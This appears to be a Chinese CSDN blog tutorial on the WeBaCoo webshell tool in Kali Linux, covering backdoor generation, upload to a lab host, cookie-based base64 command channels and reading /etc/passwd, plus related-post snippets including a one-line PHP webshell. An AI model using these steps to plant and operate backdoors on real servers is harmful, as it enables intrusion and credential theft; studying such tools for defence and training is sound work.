webshell管理-WeBaCoo和Weevely

已于 2022-04-04 23:55:38 修改
阅读量193 收藏 1
点赞数
文章标签: 安全
于 2020-03-19 09:36:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41082546/article/details/104960349
版权

WeBaCoo (Web Backdoor Cookie)

简介

类终端的shell,只针对 PHP

编码通信内容通过 cookie 头传输,隐蔽性较强

Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~

cm:bash64 编码之后的命令

cn:服务器用于返回数据的 cookie 头的名

cp:返回信息定界符

生成服务器端

webacoo -g -o webacoo.php

-g Generate backdoor code (-o is required)

-o OUTPUT Generated backdoor output filename

正在上传…重新上传取消

root@kali:~# scp webacoo.php msfadmin@192.168.199.158:/home/msfadmin/

正在上传…重新上传取消

拷贝webshell进web目录

正在上传…重新上传取消

注:将文件拷贝到目标机器除了使用scp还可以使用如下web方式

php -S 0.0.0.0:80 -t /root

python -m SimpleHttpServer 80

客户端端连接

webacoo -t -u http://10.10.10.132/webacoo.php

-t Establish remote “terminal” connection (-u is required)

-u URL Backdoor URL

正在上传…重新上传取消

cat /etc/passwd

正在上传…重新上传取消

通过 cookie 进行传输,抓包分析

Cookie: cm=Y2F0IC9ldGMvcGFzc3dk; cn=M-cookie; cp=5so!

cm:bash64 编码之后的命令

cn:服务器用于返回数据的 cookie 头的名

cp:返回信息定界符

正在上传…重新上传取消

解码查看

Cookie: cm=Y2F0IC9ldGMvcGFzc3dk; cn=M-cookie; cp=5so!

root@kali:~# echo Y2F0IC9ldGMvcGFzc3dk | base64 -d

cat /etc/passwd # 刚才在控制端执行的命令

正在上传…

最低0.47元/天 解锁文章
Micr067
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 3336
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
webacoo
qq_43776408的博客
09-29 464
WeBaCoo是一款隐蔽的脚本类Web后门工具,设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测),WebBaCoo 使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。 /////////////////////////////////// 生成服务端代码: webacoo -g -...
Kali Linux Web后门工具、Windows操作系统痕迹清除方法
dichiji8804的博客
04-14 828
Kali Linux Web后门工具 Kali的web后门工具一共有四款,今天只介绍WebaCoo 首先介绍第一个WeBaCooWeb Backdoor Cookie) WeBaCoo是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可在客户端和Web服务器之间实现执行代码的网页终端。WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。这...
Web后门工具WeBaCoo
weixin_33701294的博客
09-11 182
2019独角兽企业重金招聘Python工程师标准>>> ...
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 894
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCooWeb Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
webshell-dictionary-master 上千个webshell合集
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后...
JspMaster-Release-1.02_webshell管理_
09-29
Webshell管理的核心在于控制和审计,JspMaster提供了以下主要功能: 1. **文件上传与下载**:用户可以上传新的JSP shell文件到服务器,也可以下载已存在的文件以便分析或清除。 2. **远程执行命令**:通过webshell...
哥斯拉1.0_webshell管理_
09-30
【标题】:“哥斯拉1.0_webshell管理_”是一个关于使用名为“哥斯拉”的Webshell管理工具的专题,旨在帮助用户更好地理解和操作Webshell以进行网站安全管理。 【描述】:哥斯拉1.0是一款高效且功能丰富的Webshell...
webacoowebshell
03-04
webacoowebshell,一个轻量级的phpshell,比较好用
批量getshell教程+工具
07-28
批量getshell教程+工具
天蝎1_天蝎webshell_webshell管理_
10-01
webshell管理工具天蝎,是由冰蝎变种,可以绕过各种检测设备。
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 547
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
webshell管理之中国菜刀 蚁剑 WeBaCoo Weevely
热门推荐
马赛克的博客
12-30 1万+
一:中国菜刀 中国菜刀是一款国产的网站管理软件,直接php,asp,aspx等脚本语言,简单来说通过菜刀连接上传到网站的一句话木马,可以控制 部分甚至全部权限,现在很多菜刀都有后门,小心使用。 一般情况下,可能会被IDS,WAF,等扫描软件查杀,可以通过各种编码去绕过 二:蚁剑 蚁剑是开源的跨平台的网站管理工具,中文手册链接:https://doc.u0u.us/zh-hans/gett...
关于Kali的两个WebshellWebacoo和Weevely)的学习笔记
Mi1k7ea
03-15 6394
Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。 Web Backdoor Cookie(Webacoo): Webacoo的编码通信内容都是通过cookie头传输,隐蔽性强。 其Cookie头中的三个变量: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 直接在终端输
PHP WeBaCoo后门学习笔记
imherer的博客
09-09 373
PHP WeBaCoo后门学习笔记 - PHP WeBaCoo backdoor learning notes   WeBaCooWebBackdoorCookie)是一款隐蔽的脚本类Web后门工具。设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测)。WebBaCoo使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。 安装: 官网:http://sbechtsoudis.co...
kali渗透学习-Web渗透WebShell(中国菜刀、WeBaCoo、Weevely)
weixin_43239236的博客
01-23 819
Webshell 本质:<?php echo shell_exec($_GET['cmd']);?> 就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便 windows平台 中国菜刀 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】 1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】 使用ssh连接metasploitabl
【网络安全】红队渗透项目之Stapler1(上)
HBohan的博客
04-20 2807
声明:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 一、信息收集 信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集: 1、nmap扫描存活IP 由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息: 发现本kali ip为40段!用40段进行全网段扫描: nm.
webshell管理工具
最新发布
08-25
常用的webshell管理工具有Metasploit、QuasiBot和Webshell-Sniper。 Metasploit虽然不是专门的webshell管理工具,但它具备了一些必要的功能,如文件管理和命令执行,并且支持多种脚本类型,如ASPX、PHP和JSP。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Micr067

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值